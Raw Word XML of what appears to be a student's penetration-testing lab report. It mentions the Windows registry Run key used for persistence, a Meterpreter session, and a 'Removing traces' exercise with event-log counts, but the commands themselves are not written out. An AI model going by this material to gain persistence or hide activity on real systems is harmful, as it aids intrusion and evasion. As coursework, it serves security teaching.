        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00857F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00857F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>currentversion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00857F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873956F" w14:textId="1D607316" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="00857F69"/>
    <w:p w14:paraId="3C0ACDA6" w14:textId="77777777" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>b. proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA1E71" w14:textId="77777777" w:rsidR="001D5FF1" w:rsidRDefault="004D2457" w:rsidP="001D5FF1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406655">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9D26C8" wp14:editId="1D0865D7">
            <wp:extent cx="4733925" cy="42907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2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B85C" w14:textId="133FF517" w:rsidR="001D5FF1" w:rsidRPr="001D5FF1" w:rsidRDefault="001D5FF1" w:rsidP="001D5FF1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001D5FF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401EB46D" w14:textId="5E66C81C" w:rsidR="00CE4F47" w:rsidRDefault="00CE4F47" w:rsidP="009B0B69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Removing traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD1C24" w14:textId="70776572" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7BC7E4" w14:textId="5277C8F2" w:rsidR="00406655" w:rsidRDefault="001D5FF1" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine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4B5E70" wp14:editId="07ED49CB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>349885</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>277495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="5192395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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655">
        <w:t>a. there are 19 files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68150C17" w14:textId="77777777" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DD6779" w14:textId="69D7393D" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BBC06A" w14:textId="7F3402E8" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>b.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004874A9">
        <w:t>we should add ‘t’ after ‘-’ ex. ‘ls -t’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED1EEB" w14:textId="77777777" w:rsidR="004874A9" w:rsidRDefault="004874A9" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB98964" w14:textId="77777777" w:rsidR="004874A9" w:rsidRDefault="004874A9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09607AF7" w14:textId="3DC806CC" w:rsidR="004874A9" w:rsidRDefault="004874A9" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218B513" w14:textId="31C23FCB" w:rsidR="004874A9" w:rsidRDefault="004874A9" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04162A16" wp14:editId="4E86C1DA">
            <wp:extent cx="5731510" cy="5187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EF2" w14:textId="77777777" w:rsidR="00BF7499" w:rsidRDefault="00BF7499" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D04BFDA" w14:textId="5BDC4210" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF4C3C" w14:textId="5864DF87" w:rsidR="00BF7499" w:rsidRDefault="00BF7499" w:rsidP="001D5FF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidR="00575CC2">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">here are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>915, 1179, 0, 3198 and 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> event that are logged under </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application, Security, Setup, System and Forwarded Events</w:t>
      </w:r>
      <w:r>
        <w:t>, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F96167" w14:textId="77777777" w:rsidR="00575CC2" w:rsidRDefault="00575CC2" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62378059" w14:textId="77777777" w:rsidR="00575CC2" w:rsidRDefault="00BF7499" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C4B2B" w14:textId="77777777" w:rsidR="00575CC2" w:rsidRDefault="00575CC2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE7C76" w14:textId="1BE4AA9A" w:rsidR="00BF7499" w:rsidRDefault="001D5FF1" w:rsidP="00406655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232398A" wp14:editId="3685A4C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>342900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5991225" cy="5415732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41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7499">
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1734E" w14:textId="484BB828" w:rsidR="00BF7499" w:rsidRDefault="00BF7499" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC9233F" w14:textId="77777777" w:rsidR="00575CC2" w:rsidRDefault="00575CC2" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2235"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67ED9256" w14:textId="77777777" w:rsidR="00D4401D" w:rsidRDefault="00D4401D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A325A25" w14:textId="6EE52C18" w:rsidR="002B0DA3" w:rsidRDefault="001D5FF1" w:rsidP="002B0DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2235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96FF74" wp14:editId="08766C98">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>390525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>523875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="5159375"/>
            <wp:effectExtent l="0" t="0" r="254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DA3">
        <w:t xml:space="preserve">Since I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002B0DA3">
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002B0DA3">
        <w:t xml:space="preserve"> have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B0DA3">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B0DA3">
        <w:t xml:space="preserve"> session from task 3.1; I had to redo it. So that caused more logged events </w:t>
      </w:r>
      <w:r w:rsidR="00D4401D">
        <w:t>under some</w:t>
      </w:r>
      <w:r w:rsidR="002B0DA3">
        <w:t xml:space="preserve"> categor</w:t>
      </w:r>
      <w:r w:rsidR="00D4401D">
        <w:t>ies seen in the below screenshot</w:t>
      </w:r>
      <w:r w:rsidR="002B0DA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B637D7" w14:textId="3A411C3D" w:rsidR="00406655" w:rsidRDefault="002B0DA3" w:rsidP="002B0DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2235"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250FDDED" w14:textId="77777777" w:rsidR="00D4401D" w:rsidRDefault="00D4401D" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CF9225" w14:textId="77777777" w:rsidR="00D4401D" w:rsidRDefault="00D4401D" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A86BB2A" w14:textId="0B268876" w:rsidR="00406655" w:rsidRDefault="00406655" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DC35F" w14:textId="224D0FAC" w:rsidR="00D4401D" w:rsidRDefault="00D4401D" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C242FAF" w14:textId="328D0574" w:rsidR="00507CA4" w:rsidRDefault="00507CA4" w:rsidP="00507CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 1, 0, 1 and 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> event that are logged under </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application, Security, Setup, System and Forwarded Events</w:t>
      </w:r>
      <w:r>
        <w:t>, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67171332" w14:textId="77777777" w:rsidR="00205056" w:rsidRDefault="00205056" w:rsidP="00507CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B27A8FA" w14:textId="36A73120" w:rsidR="00507CA4" w:rsidRDefault="00507CA4" w:rsidP="00507CA4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71456BE" wp14:editId="04616A3C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>321310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="482282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07CA4" w:rsidSect="009B0B69">
      <w:headerReference w:type="default" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="144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DB7E9" w14:textId="77777777" w:rsidR="00064B4F" w:rsidRDefault="00064B4F" w:rsidP="009B0B69">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22E3F3AE" w14:textId="77777777" w:rsidR="00064B4F" w:rsidRDefault="00064B4F" w:rsidP="009B0B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65E39" w14:textId="598C4B5A" w:rsidR="009B0B69" w:rsidRDefault="009B0B69">
    <w:pPr>
      <w:pStyle w:val="Footer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1CB93" w14:textId="77777777" w:rsidR="00064B4F" w:rsidRDefault="00064B4F" w:rsidP="009B0B69">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E16CC57" w14:textId="77777777" w:rsidR="00064B4F" w:rsidRDefault="00064B4F" w:rsidP="009B0B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EC68E" w14:textId="0E20A5E2" w:rsidR="009B0B69" w:rsidRDefault="009B0B69">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="1588917E" w14:textId="77777777" w:rsidR="009B0B69" w:rsidRDefault="009B0B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3348D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC46E932"/>
    <w:lvl w:ilvl="0" w:tplc="D5A014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4DA2DE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBA86A4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4C7E3B4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66621E4C"/>
    <w:lvl w:ilvl="0" w:tplc="233063B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58F73F54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AEE242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D40B29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87A40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C787445"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F285A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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E481EDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F260FC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77C04210"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5406D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4"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:numFmt w:val="lowerLetter"/>
        <w:lvlText w:val="%1."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:numFmt w:val="lowerLetter"/>
        <w:lvlText w:val="%1."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1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4BA"/>
    <w:rsid w:val="00054290"/>
    <w:rsid w:val="00064B4F"/>
    <w:rsid w:val="0009272B"/>
    <w:rsid w:val="00122DE8"/>
    <w:rsid w:val="00197EFD"/>
    <w:rsid w:val="001D5FF1"/>
    <w:rsid w:val="001F7A53"/>
    <w:rsid w:val="00205056"/>
    <w:rsid w:val="002B0DA3"/>
    <w:rsid w:val="002E318E"/>
    <w:rsid w:val="003D44BA"/>
    <w:rsid w:val="00406655"/>
    <w:rsid w:val="004874A9"/>
    <w:rsid w:val="004D2457"/>
    <w:rsid w:val="00507CA4"/>
    <w:rsid w:val="005455A1"/>
    <w:rsid w:val="00575CC2"/>
    <w:rsid w:val="00671AEE"/>
    <w:rsid w:val="008314C1"/>
    <w:rsid w:val="00857F69"/>
    <w:rsid w:val="008B19AB"/>
    <w:rsid w:val="008E1DCB"/>
    <w:rsid w:val="009B0B69"/>
    <w:rsid w:val="00A639A6"/>
    <w:rsid w:val="00B11EBF"/>
    <w:rsid w:val="00B4015B"/>
    <w:rsid w:val="00BF7499"/>
    <w:rsid w:val="00CE4F47"/>
    <w:rsid w:val="00D4401D"/>
    <w:rsid w:val="00D8760E"/>
    <w:rsid w:val="00EA7561"/>
    <w:rsid w:val="00EB0638"/>
    <w:rsid w:val="00FC21C0"/>
    <w:rsid w:val="00FC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4ABC2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2159AD45-0EA1-4540-939F-B8DD69CFA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F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4F4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B06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9B0B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0B69"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B0B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0B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0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1492</TotalTime>
  <Pages>11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navid niknezhad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>navid niknezhad</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-13T08:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-14T10:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>